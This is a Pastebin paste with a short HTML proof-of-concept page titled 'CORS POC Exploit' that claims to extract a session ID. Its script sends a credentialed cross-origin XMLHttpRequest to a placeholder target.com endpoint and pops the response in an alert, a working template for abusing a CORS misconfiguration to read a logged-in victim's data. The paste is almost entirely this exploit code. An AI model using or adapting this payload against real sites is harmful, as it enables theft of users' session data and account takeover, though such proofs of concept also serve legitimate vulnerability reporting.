Guest User

Untitled

a guest
Jul 6th, 2017
527
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE html>
  2. <html>
  3. <body>
  4. <center>
  5. <h2>CORS POC Exploit</h2>
  6. <h3>Extract SID</h3>
  7.  
  8. <div id="demo">
  9. <button type="button" onclick="cors()">Exploit</button>
  10. </div>
  11.  
  12. <script>
  13. function cors() {
  14. var xhttp = new XMLHttpRequest();
  15. xhttp.onreadystatechange = function() {
  16. if (this.readyState == 4 && this.status == 200) {
  17. document.getElementById("demo").innerHTML = alert(this.responseText);
  18. }
  19. };
  20. xhttp.open("GET", "https://target.com/info/", true);
  21. xhttp.withCredentials = true;
  22. xhttp.send();
  23. }
  24. </script>
  25.  
  26. </body>
  27. </html>
RAW Paste Data